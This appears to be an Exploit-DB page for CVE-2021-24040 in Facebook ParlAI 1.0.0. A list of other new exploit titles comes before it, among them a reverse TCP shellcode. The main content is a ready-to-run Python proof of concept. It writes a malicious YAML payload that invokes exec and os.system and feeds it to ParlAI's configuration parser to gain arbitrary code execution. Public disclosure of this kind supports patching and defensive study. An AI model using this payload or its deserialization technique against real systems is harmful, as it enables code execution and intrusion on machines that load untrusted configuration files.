629e350774
18 changes to exploits/shellcodes Active WebCam 11.5 - Unquoted Service Path ECOA Building Automation System - Missing Encryption Of Sensitive Information Facebook ParlAI 1.0.0 - Deserialization of Untrusted Data in parlai ECOA Building Automation System - Hard-coded Credentials SSH Access Men Salon Management System 1.0 - Multiple Vulnerabilities ECOA Building Automation System - Weak Default Credentials ECOA Building Automation System - Path Traversal Arbitrary File Upload ECOA Building Automation System - Directory Traversal Content Disclosure ECOA Building Automation System - 'multiple' Cross-Site Request Forgery (CSRF) ECOA Building Automation System - Cookie Poisoning Authentication Bypass ECOA Building Automation System - Configuration Download Information Disclosure ECOA Building Automation System - Hidden Backdoor Accounts and backdoor() Function ECOA Building Automation System - Remote Privilege Escalation ECOA Building Automation System - Local File Disclosure ECOA Building Automation System - Arbitrary File Deletion Wordpress Plugin Download From Files 1.48 - Arbitrary File Upload Apartment Visitor Management System (AVMS) 1.0 - SQLi to RCE Windows/x64 - Reverse TCP (192.168.201.11:4444) Shellcode (330 Bytes)
49 lines
No EOL
1.5 KiB
Python
Executable file
49 lines
No EOL
1.5 KiB
Python
Executable file
# Exploit Title: Facebook ParlAI 1.0.0 - Deserialization of Untrusted Data in parlai
|
|
# Date: 2021-09-11
|
|
# Exploit Author: Abhiram V
|
|
# Vendor Homepage: https://parl.ai/
|
|
# Software Link: https://github.com/facebookresearch/ParlAI
|
|
# Version: < 1.1.0
|
|
# Tested on: Linux
|
|
# CVE: CVE-2021-24040
|
|
# References :
|
|
# https://github.com/facebookresearch/ParlAI/security/advisories/GHSA-m87f-9fvv-2mgg
|
|
# | https://anon-artist.github.io/blogs/blog3.html |
|
|
|
|
############################################################################
|
|
|
|
Introduction
|
|
ParlAI (pronounced “par-lay”) is a free, open-source python framework for
|
|
sharing, training and evaluating AI models on a variety of openly available
|
|
dialogue datasets.
|
|
|
|
############################################################################
|
|
|
|
Vulnerability details
|
|
|
|
############################################################################
|
|
|
|
Description
|
|
ParlAI was vulnerable to YAML deserialization attack caused by unsafe
|
|
loading which leads to Arbitrary Code Execution.
|
|
|
|
Proof of Concept
|
|
|
|
Create the following PoC file (exploit.py)
|
|
|
|
import os
|
|
#os.system('pip3 install parlai')
|
|
from parlai.chat_service.utils import config
|
|
exploit = """!!python/object/new:type
|
|
args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
|
|
listitems: "__import__('os').system('xcalc')"
|
|
"""
|
|
open('config.yml','w+').write(exploit)
|
|
config.parse_configuration_file('config.yml')
|
|
|
|
Execute the python script ie, python3 exploit.py
|
|
|
|
Impact
|
|
Code Execution
|
|
|
|
############################################################################ |